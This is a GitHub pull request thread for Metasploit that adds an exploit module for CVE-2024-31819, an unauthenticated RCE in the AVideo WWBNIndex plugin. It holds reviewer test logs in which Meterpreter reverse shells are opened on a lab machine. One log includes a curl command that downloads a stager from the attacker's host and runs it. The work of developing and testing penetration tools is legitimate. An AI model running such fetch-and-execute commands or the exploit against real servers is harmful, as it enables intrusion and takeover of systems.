New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add Exploit Module for CVE-2024-31819 in AVideo WWBNIndex Plugin #19071
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for this module!
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
Hey @Chocapikk, thanks for the module. Another great exploit making use of PhpFilterChains! I was wondering if you could please explain how you setup your I grabbed the vulnerable version from here and have tried a couple different configurations, however I keep seeing the following message in the docker logs:
When I navigate to the endpoint the |
Hey, about the log message it's not supposed to be a problem. But it's not supposed to create any issue for vulnerability testing even with this. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hey @Chocapikk - thanks for the response. I wasn't getting a session when testing and without doing much debugging I thought it might have had something to do with that issue I was seeing in the UI - my apologies. It turns out the vulnerable plugin isn't included in the 12.4 Release I downloaded.
I was able to checkout an older branch: WWBN/AVideo#8369 in order to get a vulnerable version to test successfully.
The module works great, thanks for the submission. I left a couple comments which pretty much all stem from the possibility of being able to have a vulnerable version installed without the vulnerable plugin.
Testing
PHP Payload
msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected vulnerable AVideo version: 12.4, with vulnerable plugin WWBNIndex running.
[*] Sending stage (39927 bytes) to 172.16.199.131
[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.131:44440) at 2024-05-15 11:44:59 -0700
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : msfuser-virtual-machine
OS : Linux msfuser-virtual-machine 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct 6 10:23:26 UTC 2 x86_64
Meterpreter : php/linux
meterpreter > exit
Fetch Payload Linux
msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > run
[*] Command to run on remote host: curl -so /tmp/a http://172.16.199.1:8374/Hn-8qIL46e0vZdQpIHPToA; chmod +x /tmp/a; /tmp/a &
[*] Fetch handler listening on 172.16.199.1:8374
[*] HTTP server started
[*] Adding resource /Hn-8qIL46e0vZdQpIHPToA
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected vulnerable AVideo version: 12.4, with vulnerable plugin WWBNIndex running.
[*] Client 172.16.199.131 requested /Hn-8qIL46e0vZdQpIHPToA
[*] Sending payload to 172.16.199.131 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.16.199.131
[*] Meterpreter session 8 opened (172.16.199.1:4444 -> 172.16.199.131:55714) at 2024-05-15 11:46:54 -0700
meterpreter >
meterpreter > getuid
Server username: www-data
sysinfmeterpreter > sysinfo
Computer : 172.16.199.131
OS : Ubuntu 22.04 (Linux 6.2.0-35-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
documentation/modules/exploit/multi/http/avideo_wwbnindex_unauth_rce.md
Outdated
Show resolved
Hide resolved
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
…th_rce.md Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Hey @jheysel-r7 , Thanks for checking out my PR and for the helpful feedback! I've made the changes you suggested, and it's all looking good now. Really appreciate your help. |
Anytime @Chocapikk, thanks for making those changes! I've retested and everything looks great, landing now 👍
|
10acd86
Release NotesAdd module for CVE-2024-31819 which exploits an LFI in AVideo which uses PHP Filter Chaining to turn the LFI into unauthenticated RCE. |
Greetings Metasploit Team,
I've developed an exploit module targeting a recently discovered vulnerability, CVE-2024-31819, in the AVideo platform's WWBNIndex plugin. This critical Remote Code Execution (RCE) vulnerability allows unauthenticated attackers to execute arbitrary code on vulnerable installations of AVideo from v12.4 to v14.2.
Module Details:
This module aims to provide the Metasploit community with the tools necessary to test their systems against this severe security flaw. I believe it will be a valuable addition to the Metasploit framework, aiding in the ongoing efforts to improve cybersecurity defenses.
I look forward to your feedback and am happy to make any required adjustments to meet the project's standards.
Thank you for considering this contribution.
Best regards,
Chocapikk